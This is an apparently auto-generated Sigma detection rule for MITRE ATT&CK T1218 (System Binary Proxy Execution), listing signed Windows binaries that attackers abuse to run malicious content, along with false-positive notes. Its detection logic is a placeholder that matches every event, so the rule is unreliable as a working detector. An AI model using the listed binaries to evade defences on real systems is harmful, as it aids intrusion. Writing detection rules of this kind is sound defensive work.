title: System Binary Proxy Execution (T1218)
id: df00tech-t1218
status: experimental
description: "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Several Microsoft-signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Sub-techniques include abuse of mshta.exe, rundll32.exe, regsvr32.exe, msiexec.exe, cmstp.exe, installutil.exe, regsvcs.exe, regasm.exe, odbcconf.exe, verclsid.exe, mavinject.exe, control.exe (Control Panel), compiled HTML files (hh.exe), MMC snap-ins, Electron applications, and wuauclt.exe. On Linux, trusted binaries such as split may be abused similarly. Real-world usage includes Lazarus Group abusing wuauclt.exe to execute malicious DLLs and Volt Typhoon broadly leveraging LOLBins to maintain and expand network access."
references:
  - https://attack.mitre.org/techniques/T1218/
  - https://df00tech.com/detections/T1218
author: df00tech
date: 2026/04/13
tags:
  - attack.t1218
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate software installers using msiexec.exe or installutil.exe during application deployment
  - "Administrative scripts and IT management tools (SCCM, PDQ Deploy) invoking rundll32.exe or regsvr32.exe for component registration"
  - "Corporate HTA-based applications (legacy web apps, admin dashboards) legitimately executed via mshta.exe"
  - VPN and security software installers using cmstp.exe to configure connection profiles during initial setup
  - Windows Update processes legitimately invoking wuauclt.exe as part of the update delivery mechanism
level: high